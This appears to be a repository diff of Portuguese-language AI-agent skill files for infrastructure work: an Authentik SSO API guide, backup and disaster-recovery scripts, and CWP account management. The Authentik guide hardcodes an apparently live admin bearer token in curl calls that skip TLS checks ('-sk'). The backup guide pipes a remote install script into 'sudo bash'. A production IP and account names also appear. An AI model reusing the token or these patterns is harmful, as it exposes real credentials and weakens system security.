/billing-check, /crm-ops, /ecommerce, /lead-approach, /orcamento, /saas, /content-marketing-pt, /remotion-video, /seo-content-optimization, /social-media, /video, /ui-ux-pro-max-repo, /brand-voice-generator, /frontend-design, /pptx-generator, /ui-ux-pro-max, /crm-admin, /db-design, /elementor, /mcp-dev, /nextjs, /php-dev, /react-patterns, /woocommerce, /wp-dev, /second-brain-repo, /ads, /doc-sync, /marketing-strategy, /product, /skill-creator, /sop-creator, /calendar-manager, /interview, /time, /today, /research, /youtube, /seo-audit, /seo-report, /metrics, /sdk
**Discovery:** Use the Skill tool to invoke skills.
**Example:** `Skill("skill-name")` invokes the skill.
## Your Team & Responsibilities
You are part of **4 SDKs** (TaskForce teams):
### TaskForce Claude Agents
**Purpose:** NULL
**Your responsibilities in this TaskForce:**
- **Sistema de agentes especializados para delegacao de tarefas via Task tool com consulta automatica de datasets Dify.**: NULL
### TaskForce Infraestrutura
**Purpose:** NULL
### TaskForce SaaS
**Purpose:** NULL
### TaskForce Segurança e Autenticação
**Purpose:** NULL
**Collaboration:**
- Work with other agents in your TaskForce teams
- Share knowledge and context across team members
- Leverage team-specific skills and MCPs
- Contribute to team goals and deliverables

10
infraestrutura/knowledge/datasets.json Normal file
View File

@@ -0,0 +1,10 @@
{
"description": "Dify KB datasets for Infrastructure domain",
"query_tool": "mcp__dify-kb__dify_kb_retrieve_segments",
"datasets": [
{"id": "b2a4d2c5-fe55-412c-bc28-74dbd611905d", "name": "CWP Centos Web Panel", "priority": 1, "document_count": 10, "word_count": 599430},
{"id": "7f63ec0c-6321-488c-b107-980140199850", "name": "TI", "priority": 1, "document_count": 115, "word_count": 29448495},
{"id": "bde4eddd-4618-402c-8bfb-bb947ed9219d", "name": "Linux", "priority": 2, "document_count": 4, "word_count": 336446},
{"id": "cc7f000a-ad86-49b6-b59b-179e65f8a229", "name": "AWS", "priority": 2, "document_count": 14, "word_count": 5125632}
]
}

222
infraestrutura/skills/authentik/SKILL.md Normal file
View File

@@ -0,0 +1,222 @@
---
name: authentik
description: Authentik SSO management via API v3. Users, groups, applications, providers, flows, events. Use when user mentions "authentik", "sso", "auth.descomplicar", "identity provider", "oauth2 provider", "autenticacao centralizada", "single sign-on".
author: Descomplicar® Crescimento Digital
version: 1.0.0
quality_score: 75
user_invocable: true
desk_task: 1484
---
# /authentik - Gestao Authentik via API v3
Gestao do Authentik SSO (auth.descomplicar.pt) via API REST directa com curl.
## Conexao
- **Base URL:** `https://auth.descomplicar.pt/api/v3`
- **Auth Header:** `Authorization: Bearer Sa4Zofsdm7UoMXrHRAZ4sIsvNIqCtEQ3uCZrsDg7kx3wDCKQqI0frlFuoUVS`
- **Painel Web:** https://auth.descomplicar.pt/if/admin/
## Template Base
Todas as chamadas usam este padrao:
```bash
curl -sk "https://auth.descomplicar.pt/api/v3/{ENDPOINT}" \
-H "Authorization: Bearer Sa4Zofsdm7UoMXrHRAZ4sIsvNIqCtEQ3uCZrsDg7kx3wDCKQqI0frlFuoUVS" \
-H "Content-Type: application/json"
```
Para POST/PUT/PATCH, adicionar `-X {METHOD} -d '{JSON}'`.
## Endpoints Principais
### Core - Users
| Operacao | Metodo | Endpoint |
|----------|--------|----------|
| Listar users | GET | `/core/users/` |
| Obter user | GET | `/core/users/{id}/` |
| Criar user | POST | `/core/users/` |
| Actualizar user | PATCH | `/core/users/{id}/` |
| Apagar user | DELETE | `/core/users/{id}/` |
| Pesquisar user | GET | `/core/users/?search={query}` |
| User por username | GET | `/core/users/?username={name}` |
| Desactivar user | PATCH | `/core/users/{id}/` com `{"is_active": false}` |
| Password user | POST | `/core/users/{id}/set_password/` com `{"password": "..."}` |
| Recovery link | POST | `/core/users/{id}/recovery/` |
**Campos user (POST/PATCH):**
```json
{
"username": "nome.apelido",
"name": "Nome Completo",
"email": "email@dominio.pt",
"is_active": true,
"groups": ["uuid-grupo"],
"attributes": {"chave": "valor"}
}
```
### Core - Groups
| Operacao | Metodo | Endpoint |
|----------|--------|----------|
| Listar groups | GET | `/core/groups/` |
| Criar group | POST | `/core/groups/` |
| Actualizar group | PATCH | `/core/groups/{id}/` |
| Apagar group | DELETE | `/core/groups/{id}/` |
| Adicionar user a group | POST | `/core/groups/{id}/add_user/` com `{"pk": user_id}` |
| Remover user de group | POST | `/core/groups/{id}/remove_user/` com `{"pk": user_id}` |
### Core - Applications
| Operacao | Metodo | Endpoint |
|----------|--------|----------|
| Listar apps | GET | `/core/applications/` |
| Obter app | GET | `/core/applications/{slug}/` |
| Criar app | POST | `/core/applications/` |
| Actualizar app | PATCH | `/core/applications/{slug}/` |
| Apagar app | DELETE | `/core/applications/{slug}/` |
**Campos app:**
```json
{
"name": "Nome App",
"slug": "nome-app",
"provider": provider_pk,
"launch_url": "https://app.dominio.pt",
"open_in_new_tab": true,
"meta_description": "Descricao"
}
```
### Providers (OAuth2/Proxy/LDAP)
| Operacao | Metodo | Endpoint |
|----------|--------|----------|
| Listar OAuth2 | GET | `/providers/oauth2/` |
| Criar OAuth2 | POST | `/providers/oauth2/` |
| Listar Proxy | GET | `/providers/proxy/` |
| Criar Proxy | POST | `/providers/proxy/` |
| Listar LDAP | GET | `/providers/ldap/` |
| Listar todos | GET | `/providers/all/` |
**OAuth2 provider campos:**
```json
{
"name": "Nome Provider",
"authorization_flow": "flow-uuid",
"invalidation_flow": "flow-uuid",
"client_type": "confidential",
"redirect_uris": "https://app.dominio.pt/callback"
}
```
### Flows
| Operacao | Metodo | Endpoint |
|----------|--------|----------|
| Listar flows | GET | `/flows/instances/` |
| Obter flow | GET | `/flows/instances/{slug}/` |
| Flow bindings | GET | `/flows/bindings/` |
### Events (Audit)
| Operacao | Metodo | Endpoint |
|----------|--------|----------|
| Listar events | GET | `/events/events/` |
| Filtrar por accao | GET | `/events/events/?action={action}` |
| Filtrar por user | GET | `/events/events/?username={user}` |
| Notifications | GET | `/events/notifications/` |
| System tasks | GET | `/events/system_tasks/` |
**Accoes comuns:** `login`, `login_failed`, `logout`, `user_write`, `model_created`, `model_updated`, `model_deleted`, `authorize_application`
### Tokens
| Operacao | Metodo | Endpoint |
|----------|--------|----------|
| Listar tokens | GET | `/core/tokens/` |
| Criar token | POST | `/core/tokens/` |
| Obter token | GET | `/core/tokens/{identifier}/` |
| Apagar token | DELETE | `/core/tokens/{identifier}/` |
| View key | GET | `/core/tokens/{identifier}/view_key/` |
### Outposts
| Operacao | Metodo | Endpoint |
|----------|--------|----------|
| Listar outposts | GET | `/outposts/instances/` |
| Health outpost | GET | `/outposts/instances/{id}/health/` |
| Service connections | GET | `/outposts/service_connections/all/` |
### Admin / Sistema
| Operacao | Metodo | Endpoint |
|----------|--------|----------|
| System info | GET | `/admin/system/` |
| Version | GET | `/admin/version/` |
| Workers | GET | `/admin/workers/` |
| Metrics | GET | `/admin/metrics/` |
| System tasks | GET | `/admin/system_tasks/` |
## Paginacao
Todos os endpoints de lista suportam:
- `?page=N` - pagina (default: 1)
- `?page_size=N` - itens por pagina (default: 20, max: depende)
- `?ordering=field` - ordenacao (prefixo `-` para descendente)
- `?search=query` - pesquisa texto livre
Resposta paginada:
```json
{
"pagination": {"next": 2, "previous": 0, "count": 50, "current": 1, "total_pages": 3},
"results": [...]
}
```
## Aplicacoes Actuais
| App | Slug | URL |
|-----|------|-----|
| Dashboard Descomplicar | dashboard-descomplicar | https://dash.descomplicar.pt |
| MCP Gateway | mcp-gateway | https://gateway.descomplicar.pt |
## Exemplos Praticos
### Listar todos os users
```bash
curl -sk "https://auth.descomplicar.pt/api/v3/core/users/" \
-H "Authorization: Bearer Sa4Zofsdm7UoMXrHRAZ4sIsvNIqCtEQ3uCZrsDg7kx3wDCKQqI0frlFuoUVS"
```
### Criar user
```bash
curl -sk -X POST "https://auth.descomplicar.pt/api/v3/core/users/" \
-H "Authorization: Bearer Sa4Zofsdm7UoMXrHRAZ4sIsvNIqCtEQ3uCZrsDg7kx3wDCKQqI0frlFuoUVS" \
-H "Content-Type: application/json" \
-d '{"username": "joao.silva", "name": "Joao Silva", "email": "joao@empresa.pt", "is_active": true}'
```
### Ver login events ultimas 24h
```bash
curl -sk "https://auth.descomplicar.pt/api/v3/events/events/?action=login&ordering=-created" \
-H "Authorization: Bearer Sa4Zofsdm7UoMXrHRAZ4sIsvNIqCtEQ3uCZrsDg7kx3wDCKQqI0frlFuoUVS"
```
### Health check sistema
```bash
curl -sk "https://auth.descomplicar.pt/api/v3/admin/system/" \
-H "Authorization: Bearer Sa4Zofsdm7UoMXrHRAZ4sIsvNIqCtEQ3uCZrsDg7kx3wDCKQqI0frlFuoUVS"
```
## Regras
1. SEMPRE confirmar com utilizador antes de criar/apagar users
2. NUNCA apagar users admin (akadmin)
3. Pesquisar duplicados antes de criar users (como CRM)
4. Passwords devem ter minimo 12 caracteres
5. Verificar groups existentes antes de associar

760
infraestrutura/skills/backup-strategies/SKILL.md Normal file
View File

@@ -0,0 +1,760 @@
---
name: backup-strategies
description: Backup strategy planning and implementation. Creates backup plans for
databases, files, and configurations. Use when user mentions "backup", "backup strategy",
"disaster recovery", "backup plan", "restore strategy".
author: Descomplicar® Crescimento Digital
version: 2.0.0
quality_score: 75
user_invocable: true
desk_task: 1463
allowed-tools: Edit
---
# /backup-strategies - Backup e Disaster Recovery
Implementação de estratégias de backup completas seguindo best practices de RPO/RTO e regra 3-2-1.
---
## Quando Usar
- Planear estratégia de backup para novo projecto
- Implementar backup automatizado
- Configurar disaster recovery
- Definir políticas de retenção
- Testar procedimentos de restore
- Auditar backups existentes
- Recuperar de falha/corrupção
---
## Conceitos Core
### RPO vs RTO
```
┌─────────────────────────────────────────────────┐
│ │
│ INCIDENTE │
│ │ │
│ ├─────────► RPO ◄────┤ │
│ │ (Dados │ │
│ │ perdidos) │ │
│ │ │ │
│ ├─────────────────────►RTO◄────┤ │
│ (Downtime) │ │
│ │ │
│ RECOVERY │
│ COMPLETO │
└─────────────────────────────────────────────────┘
RPO (Recovery Point Objective)
= Máximo de dados que pode perder
= Frequência mínima de backups
RTO (Recovery Time Objective)
= Tempo máximo para restaurar
= Define tipo de solução DR
```
**Tabela de Decisão:**
| Criticidade | RPO | RTO | Solução | Custo |
|-------------|-----|-----|---------|-------|
| **Crítico** | 0 | <1h | Replicação real-time + hot standby | €€€€ |
| **Alto** | 1h | <4h | Backup horário + warm standby | €€€ |
| **Médio** | 24h | <24h | Backup diário + cold backup | €€ |
| **Baixo** | 7d | <72h | Backup semanal | € |
### Regra 3-2-1
```
┌────────────────────────────────────────────────┐
│ REGRA 3-2-1 │
├────────────────────────────────────────────────┤
│ │
│ 3 → Três cópias dos dados │
│ ├─ Original (produção) │
│ ├─ Backup 1 (local) │
│ └─ Backup 2 (offsite) │
│ │
│ 2 → Dois tipos de media diferentes │
│ ├─ Disco local (NAS/SSD) │
│ └─ Cloud storage (S3/Drive) │
│ │
│ 1 → Uma cópia offsite │
│ └─ Protege contra desastres locais │
│ (incêndio, inundação, roubo) │
│ │
└────────────────────────────────────────────────┘
```
**Exemplo Implementação:**
1. **Produção:** Servidor CWP (176.9.3.158)
2. **Backup Local:** NAS Synology ou disco externo
3. **Backup Offsite:** Google Drive + S3 (Wasabi)
---
## Estratégias por Tipo de Dados
### 1. Bases de Dados (MySQL/PostgreSQL)
#### MySQL - Dump com Compressão
```bash
#!/bin/bash
# backup-mysql.sh - Backup consistente de BD MySQL
# Configuração
DB_NAME="ealmeida_desk24"
DB_USER="root"
DB_PASS="PASSWORD" # Usar ficheiro .my.cnf na prática
BACKUP_DIR="/backups/mysql"
DATE=$(date +%Y%m%d_%H%M%S)
RETENTION_DAYS=7
# Criar directório se não existe
mkdir -p "$BACKUP_DIR"
# Backup com single-transaction (consistência InnoDB)
mysqldump \
--single-transaction \
--routines \
--triggers \
--events \
--hex-blob \
-u "$DB_USER" \
-p"$DB_PASS" \
"$DB_NAME" | gzip -9 > "$BACKUP_DIR/${DB_NAME}_${DATE}.sql.gz"
# Verificar sucesso
if [ $? -eq 0 ]; then
echo "✅ Backup $DB_NAME concluído: ${BACKUP_DIR}/${DB_NAME}_${DATE}.sql.gz"
# Calcular tamanho
SIZE=$(du -h "$BACKUP_DIR/${DB_NAME}_${DATE}.sql.gz" | cut -f1)
echo "📦 Tamanho: $SIZE"
else
echo "❌ ERRO ao fazer backup de $DB_NAME"
exit 1
fi
# Rotação (eliminar backups >7 dias)
find "$BACKUP_DIR" -name "${DB_NAME}_*.sql.gz" -mtime +$RETENTION_DAYS -delete
echo "🗑️ Backups antigos eliminados (>$RETENTION_DAYS dias)"
# Upload para cloud (opcional)
# rclone copy "$BACKUP_DIR/${DB_NAME}_${DATE}.sql.gz" gdrive:backups/mysql/
```
**Opções Críticas:**
- `--single-transaction`: Consistência sem lock de tabelas (InnoDB)
- `--routines`: Incluir stored procedures
- `--triggers`: Incluir triggers
- `--events`: Incluir events agendados
- `--hex-blob`: Formato binário seguro para BLOBs
**Anti-Patterns:**
-`mysqldump database > backup.sql` - Sem single-transaction (inconsistente)
- ❌ Backup sem compressão (desperdiça espaço)
- ❌ Password na linha de comando (inseguro)
#### PostgreSQL - pg_dump
```bash
# Backup PostgreSQL com compressão máxima
pg_dump -Fc -Z9 -d database_name > backup_$(date +%Y%m%d_%H%M%S).dump
# Backup de cluster completo
pg_dumpall -c | gzip > cluster_backup_$(date +%Y%m%d).sql.gz
```
#### Backup Incremental com Binlog (MySQL)
```bash
# Activar binlog (my.cnf)
# [mysqld]
# log-bin=/var/log/mysql/mysql-bin.log
# expire_logs_days=7
# Backup incremental desde último full backup
mysqlbinlog --read-from-remote-server --host=localhost \
--start-datetime="2026-02-03 00:00:00" \
mysql-bin.000001 > incremental_backup.sql
```
### 2. Ficheiros WordPress
#### Backup Completo
```bash
#!/bin/bash
# backup-wordpress.sh - Backup completo de site WordPress
SITE_NAME="emanuelalmeida"
SITE_PATH="/home/ealmeida/emanuelalmeida.pt"
BACKUP_DIR="/backups/wordpress"
DATE=$(date +%Y%m%d_%H%M%S)
mkdir -p "$BACKUP_DIR"
# Backup com exclusões inteligentes
tar -czf "$BACKUP_DIR/${SITE_NAME}_${DATE}.tar.gz" \
--exclude='wp-content/cache' \
--exclude='wp-content/uploads/cache' \
--exclude='wp-content/upgrade' \
--exclude='wp-content/backup-*' \
--exclude='*.log' \
-C "$(dirname $SITE_PATH)" \
"$(basename $SITE_PATH)"
# Validar arquivo criado
if [ -f "$BACKUP_DIR/${SITE_NAME}_${DATE}.tar.gz" ]; then
SIZE=$(du -h "$BACKUP_DIR/${SITE_NAME}_${DATE}.tar.gz" | cut -f1)
echo "✅ Backup WordPress $SITE_NAME: $SIZE"
# Testar integridade
tar -tzf "$BACKUP_DIR/${SITE_NAME}_${DATE}.tar.gz" > /dev/null 2>&1
if [ $? -eq 0 ]; then
echo "✅ Integridade verificada"
else
echo "❌ Arquivo corrompido!"
exit 1
fi
else
echo "❌ Falha ao criar backup"
exit 1
fi
# Rotação
find "$BACKUP_DIR" -name "${SITE_NAME}_*.tar.gz" -mtime +7 -delete
```
#### Backup Incremental com rsync
```bash
#!/bin/bash
# backup-incremental-rsync.sh
SOURCE="/home/ealmeida/emanuelalmeida.pt"
BACKUP_BASE="/backups/incremental"
DATE=$(date +%Y%m%d)
# Backup incremental (apenas alterações)
rsync -avz --delete \
--backup --backup-dir="$BACKUP_BASE/delta/$DATE" \
--exclude='wp-content/cache' \
"$SOURCE/" "$BACKUP_BASE/current/"
echo "✅ Backup incremental concluído"
echo "📁 Alterações em: $BACKUP_BASE/delta/$DATE"
```
#### Apenas Ficheiros Alterados (Últimas 24h)
```bash
# Backup apenas ficheiros modificados hoje
find /var/www/html -mtime -1 -type f | \
tar -czf changes_$(date +%Y%m%d).tar.gz -T -
```
### 3. Servidor CWP Completo
#### Backup Conta CWP
```bash
# Usar ferramenta nativa CWP
/usr/local/cwpsrv/htdocs/resources/scripts/backup_accounts \
--account=username \
--type=full \
--destination=/backups/cwp
# Lista de contas
cat /etc/passwd | grep '/home/' | cut -d: -f1
```
#### Backup Configurações Servidor
```bash
#!/bin/bash
# backup-server-config.sh
BACKUP_DIR="/backups/config"
DATE=$(date +%Y%m%d_%H%M%S)
# Backup de todas as configurações críticas
tar -czf "$BACKUP_DIR/server_config_${DATE}.tar.gz" \
/etc/nginx \
/etc/apache2 \
/etc/httpd \
/etc/mysql \
/etc/my.cnf \
/etc/php* \
/usr/local/cwpsrv/conf \
/root/.acme.sh/cwp_certs \
/etc/cron* \
/etc/fstab \
/etc/hosts \
/etc/sysconfig/network-scripts
echo "✅ Backup configurações servidor: ${BACKUP_DIR}/server_config_${DATE}.tar.gz"
```
---
## Retenção Recomendada (GFS - Grandfather-Father-Son)
| Tipo | Retenção | Frequência | Slot |
|------|----------|------------|------|
| **Horário** | 24h | A cada hora | 24 slots |
| **Diário** | 7 dias | 1x/dia (00:00) | 7 slots |
| **Semanal** | 4 semanas | 1x/semana (domingo) | 4 slots |
| **Mensal** | 12 meses | 1x/mês (dia 1) | 12 slots |
| **Anual** | 7 anos | 1x/ano (1 janeiro) | 7 slots |
**Total slots:** 24 + 7 + 4 + 12 + 7 = **54 backups simultâneos**
### Script de Rotação GFS
```bash
#!/bin/bash
# backup-rotation-gfs.sh
BACKUP_DIR="/backups"
# Definir retenção
HOURLY_KEEP=24
DAILY_KEEP=7
WEEKLY_KEEP=4
MONTHLY_KEEP=12
# Rotação por tipo
echo "🔄 Rotação de backups..."
# Horários (manter 24h)
find "$BACKUP_DIR/hourly" -mtime +1 -delete
echo " Horários: mantidos últimas 24h"
# Diários (manter 7 dias)
find "$BACKUP_DIR/daily" -mtime +$DAILY_KEEP -delete
echo " Diários: mantidos $DAILY_KEEP dias"
# Semanais (manter 4 semanas)
find "$BACKUP_DIR/weekly" -mtime +$((WEEKLY_KEEP * 7)) -delete
echo " Semanais: mantidos $WEEKLY_KEEP semanas"
# Mensais (manter 12 meses)
find "$BACKUP_DIR/monthly" -mtime +$((MONTHLY_KEEP * 30)) -delete
echo " Mensais: mantidos $MONTHLY_KEEP meses"
echo "✅ Rotação concluída"
# Relatório de espaço
du -sh "$BACKUP_DIR"/*
```
---
## Disaster Recovery
### Checklist DR
- [ ] Backups testados (restore funciona?)
- [ ] Documentação actualizada (runbook)
- [ ] Runbook de recovery acessível offline
- [ ] Contactos de emergência definidos
- [ ] Acesso offsite confirmado (credenciais)
- [ ] Teste DR trimestral agendado
- [ ] RTO/RPO documentados
- [ ] Plano de comunicação (clientes/equipa)
### Runbook de Recovery
```markdown
# 🚨 DISASTER RECOVERY RUNBOOK
## Cenário: Servidor CWP Inoperacional
### Passo 1: Avaliação (5 min)
- [ ] Confirmar que servidor não responde (ping, SSH)
- [ ] Identificar tipo de falha (hardware, software, ataque)
- [ ] Activar equipa de recovery
- [ ] Comunicar clientes afectados (se downtime >1h)
### Passo 2: Decisão (10 min)
- [ ] Tentar recovery no servidor actual?
- [ ] Provisionar novo servidor?
- [ ] Activar failover (se existir)?
### Passo 3: Provisionar Servidor (30 min)
- [ ] Servidor novo: Ubuntu 22.04 ou CentOS 7
- [ ] Instalar CWP: `sh cwp-el7-latest.sh`
- [ ] Configurar firewall e SSH
- [ ] Configurar DNS (apontar para novo IP)
### Passo 4: Restore Bases de Dados (1-2h)
```bash
# Descomprimir backup mais recente
gunzip ealmeida_desk24_20260203_120000.sql.gz
# Criar BD
mysql -e "CREATE DATABASE ealmeida_desk24;"
# Restore
mysql ealmeida_desk24 < ealmeida_desk24_20260203_120000.sql
# Verificar
mysql -e "USE ealmeida_desk24; SHOW TABLES;"
```
### Passo 5: Restore Ficheiros (1-2h)
```bash
# Descomprimir backup sites
tar -xzf wordpress_sites_20260203.tar.gz -C /tmp/
# Copiar para CWP
cp -r /tmp/emanuelalmeida.pt /home/ealmeida/
# Corrigir permissões
chown -R ealmeida:ealmeida /home/ealmeida/emanuelalmeida.pt
chmod 755 /home/ealmeida/emanuelalmeida.pt
```
### Passo 6: Restore Configurações (30 min)
```bash
# Descomprimir backup config
tar -xzf server_config_20260203.tar.gz -C /tmp/
# Restaurar Nginx/Apache
cp -r /tmp/etc/nginx/* /etc/nginx/
cp -r /tmp/etc/httpd/* /etc/httpd/
# Restaurar MySQL config
cp /tmp/etc/my.cnf /etc/my.cnf
# Restaurar SSL
cp -r /tmp/root/.acme.sh/cwp_certs/* /root/.acme.sh/cwp_certs/
```
### Passo 7: Validação (30 min)
- [ ] Testar acesso SSH
- [ ] MySQL a responder
- [ ] Apache/Nginx a correr
- [ ] Sites WordPress a carregar
- [ ] SSL activo
- [ ] Email a funcionar (se aplicável)
### Passo 8: DNS Update (2-24h propagação)
- [ ] Actualizar DNS A records para novo IP
- [ ] Aguardar propagação (verificar: `dig +short domain.pt`)
- [ ] Monitorizar logs de acesso
### Passo 9: Comunicação
- [ ] Notificar equipa: recovery completo
- [ ] Notificar clientes: serviços restaurados
- [ ] Documentar lições aprendidas
**RTO Total Estimado:** 4-6 horas
**RPO:** Depende de frequência de backup (diário = 24h)
```
### Restore Testing (OBRIGATÓRIO)
```bash
#!/bin/bash
# test-restore.sh - Testar restore em ambiente isolado
TEST_DB="test_restore_$(date +%Y%m%d)"
BACKUP_FILE="/backups/mysql/ealmeida_desk24_latest.sql.gz"
echo "🧪 TESTE DE RESTORE"
echo "==================="
# 1. Criar BD de teste
mysql -e "CREATE DATABASE $TEST_DB;"
echo "✅ BD de teste criada: $TEST_DB"
# 2. Restore do backup
gunzip < "$BACKUP_FILE" | mysql "$TEST_DB"
echo "✅ Backup restaurado"
# 3. Validar integridade
TABLES=$(mysql -Nse "SELECT COUNT(*) FROM information_schema.TABLES WHERE table_schema='$TEST_DB';")
echo "📊 Tabelas restauradas: $TABLES"
# 4. Check de tabelas
mysqlcheck --check "$TEST_DB" | grep -i error
if [ $? -ne 0 ]; then
echo "✅ Sem erros detectados"
else
echo "❌ Erros encontrados!"
fi
# 5. Verificar dados (exemplo)
ROWS=$(mysql -Nse "SELECT COUNT(*) FROM $TEST_DB.tbltasks;")
echo "📝 Registos tbltasks: $ROWS"
# 6. Tempo de restore
echo "⏱️ Tempo restore: calculado acima"
# 7. Limpar
mysql -e "DROP DATABASE $TEST_DB;"
echo "🗑️ BD de teste eliminada"
echo ""
echo "✅ TESTE CONCLUÍDO - Backup válido e funcional"
```
**Frequência:** Mensal (mínimo)
---
## Automação com Cron
```bash
# Editar crontab
crontab -e
```
**Exemplo de Schedule:**
```cron
# Backup MySQL (diário às 02:00)
0 2 * * * /root/scripts/backup-mysql.sh >> /var/log/backup-mysql.log 2>&1
# Backup WordPress (diário às 03:00)
0 3 * * * /root/scripts/backup-wordpress.sh >> /var/log/backup-wp.log 2>&1
# Backup configurações (semanal, domingo 04:00)
0 4 * * 0 /root/scripts/backup-server-config.sh >> /var/log/backup-config.log 2>&1
# Rotação backups (diário às 05:00)
0 5 * * * /root/scripts/backup-rotation-gfs.sh >> /var/log/backup-rotation.log 2>&1
# Teste de restore (mensal, dia 1 às 06:00)
0 6 1 * * /root/scripts/test-restore.sh >> /var/log/test-restore.log 2>&1
# Sync para cloud (diário às 07:00)
0 7 * * * rclone sync /backups gdrive:backups >> /var/log/rclone-sync.log 2>&1
```
**Monitorização:**
```bash
# Ver últimas execuções
tail -50 /var/log/backup-mysql.log
# Alertas de falha (adicionar ao script)
if [ $? -ne 0 ]; then
echo "ERRO: Backup falhou" | mail -s "BACKUP FAILED" admin@domain.com
fi
```
---
## Cloud Sync com rclone
### Configuração
```bash
# Instalar rclone
curl https://rclone.org/install.sh | sudo bash
# Configurar Google Drive
rclone config
# Nome: gdrive
# Tipo: drive
# Seguir wizard de autenticação
```
### Sync Automático
```bash
#!/bin/bash
# sync-backups-cloud.sh
LOCAL_DIR="/backups"
REMOTE="gdrive:backups"
# Sync (mantém estrutura)
rclone sync "$LOCAL_DIR" "$REMOTE" \
--exclude "*.tmp" \
--exclude "*.log" \
--progress
echo "✅ Sync para cloud concluído"
```
---
## Anti-Patterns (EVITAR)
| Anti-Pattern | Problema | Solução Correcta |
|--------------|----------|------------------|
| **Backup sem teste** | Pode falhar no restore | Teste mensal obrigatório |
| **Apenas local** | Perda em desastre | Regra 3-2-1 (offsite obrigatório) |
| **Sem encriptação** | Dados expostos | Encriptar backups sensíveis |
| **Manual** | Esquecimento humano | Automatizar via cron |
| **Sem alertas** | Falhas não detectadas | Monitorização + notificações |
| **Password no comando** | Inseguro (history, ps) | Usar .my.cnf ou variáveis ENV |
| **Backup sem rotação** | Disco cheio | Script de rotação automático |
| **Sem documentação** | Caos em emergência | Runbook DR actualizado |
---
## Checklist Implementação Completa
### Planeamento
- [ ] RPO/RTO definidos por sistema
- [ ] Regra 3-2-1 implementada
- [ ] Política de retenção GFS
- [ ] Budget aprovado (storage, cloud)
### Automação
- [ ] Scripts de backup criados
- [ ] Cron jobs configurados
- [ ] Rotação automática activa
- [ ] Cloud sync activo (rclone)
### Segurança
- [ ] Encriptação em backups sensíveis
- [ ] Permissões correctas (600/700)
- [ ] Passwords em .my.cnf
- [ ] Offsite com autenticação 2FA
### Monitorização
- [ ] Logs de backup centralizados
- [ ] Alertas de falha (email/Slack)
- [ ] Dashboard de status (opcional)
- [ ] Relatório semanal automático
### Disaster Recovery
- [ ] Runbook DR criado e testado
- [ ] Teste restore mensal agendado
- [ ] Documentação offline acessível
- [ ] Equipa treinada
- [ ] Contactos de emergência definidos
### Validação
- [ ] Primeiro restore teste executado
- [ ] RTO medido (tempo real)
- [ ] RPO validado (dados perdidos)
- [ ] Runbook ajustado conforme teste
---
## Datasets Dify (Consulta Obrigatória)
Consultar para aprofundar conhecimento ou resolver casos específicos:
| Dataset | ID | Uso |
|---------|----|----|
| **TI (Tecnologia da Informação)** | `7f63ec0c-6321-488c-b107-980140199850` | Estratégias backup gerais |
| **Linux** | `bde4eddd-4618-402c-8bfb-bb947ed9219d` | Scripts rsync, tar, cron |
| **CWP Centos Web Panel** | `b2a4d2c5-fe55-412c-bc28-74dbd611905d` | Backup contas CWP |
| **AWS (Amazon Web Services)** | `cc7f000a-ad86-49b6-b59b-179e65f8a229` | S3, Glacier, EBS snapshots |
**Consultar quando:**
- Implementar estratégia backup em nova plataforma
- Optimizar scripts de backup existentes
- Configurar replicação de dados
- Disaster recovery multi-datacenter
```javascript
// Exemplo: pesquisar backup incremental MySQL
mcp__dify-kb__dify_kb_retrieve_segments({
dataset_id: "7f63ec0c-6321-488c-b107-980140199850",
query: "mysql binlog incremental backup recovery",
top_k: 3
})
```
---
## Changelog
### v2.0.0 (2026-02-03)
- **ENHANCED:** Workflows detalhados para cada tipo de backup
- Scripts completos prontos a usar (MySQL, WordPress, CWP)
- Runbook DR completo passo-a-passo
- GFS retention policy implementada
- Automação com cron documentada
- Cloud sync com rclone
- Teste de restore automatizado
- Anti-patterns identificados
- Checklist de implementação completa
### v1.0.0 (2026-01-27)
- Versão inicial
- Conceitos RPO/RTO e regra 3-2-1
- Estratégias básicas por tipo de dados
---
**Versão:** 2.0.0 | **Autor:** Descomplicar®
**Última actualização:** 2026-02-03 (Scripts prontos + DR Runbook + Automação)
---
## Quando NÃO Usar
- Para tarefas fora do domínio de especialização desta skill
- Quando outra skill mais específica está disponível
- Para operações que requerem aprovação manual obrigatória
- Quando os requisitos não estão claramente definidos
## Protocolo de Execução
1. **Análise Inicial**
- Verificar requisitos e contexto
- Identificar ferramentas necessárias
2. **Preparação**
- Validar acesso a recursos
- Preparar ambiente de trabalho
3. **Execução**
- Executar operações de forma incremental
- Validar cada passo antes de prosseguir
4. **Validação**
- Verificar resultados obtidos
- Confirmar sucesso da operação
5. **Conclusão**
- Documentar alterações realizadas
- Reportar status final e próximos passos
## Exemplos de Uso
### Exemplo 1: Caso Básico
```
User: [requisição simples relacionada com backup-strategies]
Skill: [execução directa com validação]
Output: [resultado conciso e accionável]
```
### Exemplo 2: Caso Complexo
```
User: [requisição multi-passo ou complexa]
Skill:
1. Análise dos requisitos
2. Planeamento da abordagem
3. Execução faseada
4. Validação contínua
Output: [resultado detalhado com próximos passos]
```
### Exemplo 3: Caso com Dependências
```
User: [requisição que depende de outros sistemas]
Skill:
1. Verificar dependências disponíveis
2. Coordenar com skills/MCPs necessários
3. Executar workflow integrado
Output: [resultado completo com referências]
```

249
infraestrutura/skills/cwp-accounts/SKILL.md Normal file
View File

@@ -0,0 +1,249 @@
---
name: cwp-accounts
description: CWP user account management using official /scripts/cwp_api. Create, suspend, remove accounts, fix permissions. Based on official CWP documentation only. Use when user mentions "conta cwp", "user cwp", "criar conta", "suspender conta", "permissões cwp".
author: Descomplicar® Crescimento Digital
version: 1.0.0
quality_score: 70
user_invocable: true
desk_task: null
---
# /cwp-accounts - Gestão de Contas CWP (Documentação Oficial)
Gestão de contas de utilizador no CWP usando API oficial. **Zero assumptions, zero hallucinations** - apenas comandos documentados.
**REGRA #38 - ZERO INVENCAO:** NUNCA improvisar comandos. Verificar estado actual ANTES de alterar. Pesquisar wiki CWP se necessario. Usar APENAS scripts oficiais.
---
## Servidor Alvo
| Servidor | IP | MCP | User |
|----------|-----|-----|------|
| **CWP Principal** | 176.9.3.158 | ssh-unified | root |
---
## Documentação Base
- [CWP Admin API](https://wiki.centos-webpanel.com/cwp-admin-api)
- [CWP Scripts](https://wiki.centos-webpanel.com/cwp-scripts)
---
## Scripts de Consulta (Apenas Leitura)
| Script | Descrição | Uso |
|--------|-----------|-----|
| `/scripts/list_users` | Lista todas as contas | `sh /scripts/list_users` |
| `/scripts/list_domains` | Lista todos os addon domains | `sh /scripts/list_domains` |
| `/scripts/list_subdomains` | Lista todos os subdomínios | `sh /scripts/list_subdomains` |
| `/scripts/whoowns` | Descobre owner de domínio | `sh /scripts/whoowns DOMINIO` |
---
